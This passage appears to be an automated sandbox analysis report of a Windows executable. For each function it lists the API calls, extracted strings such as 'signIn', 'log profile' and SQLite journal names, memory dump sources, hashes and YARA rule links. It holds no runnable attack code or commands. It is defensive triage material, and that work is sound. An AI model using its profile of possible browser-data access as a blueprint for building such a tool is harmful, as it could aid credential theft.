                                • API String ID: 3300951397-293699754
                                • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D134, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                • wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                • wcslen.MSVCRT ref: 0040D1D3
                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                • memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                • String ID: strings
                                • API String ID: 3166385802-3030018805
                                • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411AC5, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00411AF6
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                • wcsrchr.MSVCRT ref: 00411B14
                                • wcscat.MSVCRT ref: 00411B2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                • String ID: AE$.cfg$General$EA
                                • API String ID: 776488737-1622828088
                                • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D898, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040D8BD
                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                • memset.MSVCRT ref: 0040D906
                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                • _wcsicmp.MSVCRT ref: 0040D92F
                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                • String ID: sysdatetimepick32
                                • API String ID: 1028950076-4169760276
                                • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B7D9, Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: -journal$-wal
                                • API String ID: 438689982-2894717839
                                • Opcode ID: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                • Opcode Fuzzy Hash: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00405B83, Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Item$Dialog$MessageSend
                                • String ID:
                                • API String ID: 3975816621-0
                                • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00444C89, Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                Download Yara Rule
                                APIs
                                • _wcsicmp.MSVCRT ref: 00444D09
                                • _wcsicmp.MSVCRT ref: 00444D1E
                                • _wcsicmp.MSVCRT ref: 00444D33
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsicmp$wcslen$_memicmp
                                • String ID: .save$http://$https://$log profile$signIn
                                • API String ID: 1214746602-2708368587
                                • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00405DD1, Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                • String ID:
                                • API String ID: 2313361498-0
                                • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00405F4E, Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetClientRect.USER32(?,?), ref: 00405F65
                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                • GetWindow.USER32(00000000), ref: 00405F80
                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Window$ItemMessageRectSend$Client
                                • String ID:
                                • API String ID: 2047574939-0
                                • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040987A, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • EmptyClipboard.USER32 ref: 00409882
                                • wcslen.MSVCRT ref: 0040988F
                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                • memcpy.MSVCRT ref: 004098B5
                                • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                • CloseClipboard.USER32 ref: 004098D7
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                • String ID:
                                • API String ID: 2014503067-0
                                • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044A7C0, Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                • memcpy.MSVCRT ref: 0044A8BF
                                • memcpy.MSVCRT ref: 0044A90C
                                • memcpy.MSVCRT ref: 0044A988
                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                • memcpy.MSVCRT ref: 0044A9D8
                                • memcpy.MSVCRT ref: 0044AA19
                                • memcpy.MSVCRT ref: 0044AA4A
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: gj
                                • API String ID: 438689982-4203073231
                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00430C36, Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy
                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                • API String ID: 3510742995-2446657581
                                • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00405A0E, Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                • memset.MSVCRT ref: 00405ABB
                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                • SetFocus.USER32(?), ref: 00405B76
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: MessageSend$FocusItemmemset
                                • String ID:
                                • API String ID: 4281309102-0
                                • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040FA33, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _snwprintfwcscat
                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                • API String ID: 384018552-4153097237
                                • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D7A7, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ItemMenu$CountInfomemsetwcschr
                                • String ID: 0$6
                                • API String ID: 2029023288-3849865405
                                • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040541F, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                • memset.MSVCRT ref: 00405455
                                • memset.MSVCRT ref: 0040546C
                                • memset.MSVCRT ref: 00405483
                                • memcpy.MSVCRT ref: 00405498
                                • memcpy.MSVCRT ref: 004054AD
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$memcpy$ErrorLast
                                • String ID: 6$\
                                • API String ID: 404372293-1284684873
                                • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A06C, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                Download Yara Rule
                                APIs
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                • wcscpy.MSVCRT ref: 0040A0D9
                                • wcscat.MSVCRT ref: 0040A0E6
                                • wcscat.MSVCRT ref: 0040A0F5
                                • wcscpy.MSVCRT ref: 0040A107
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                • String ID:
                                • API String ID: 1331804452-0
                                • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404363, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                • String ID: advapi32.dll
                                • API String ID: 2012295524-4050573280
                                • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410030, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                • <%s>, xrefs: 004100A6
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$_snwprintf
                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                • API String ID: 3473751417-2880344631
                                • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A178, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcscat$_snwprintfmemset
                                • String ID: %2.2X
                                • API String ID: 2521778956-791839006
                                • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
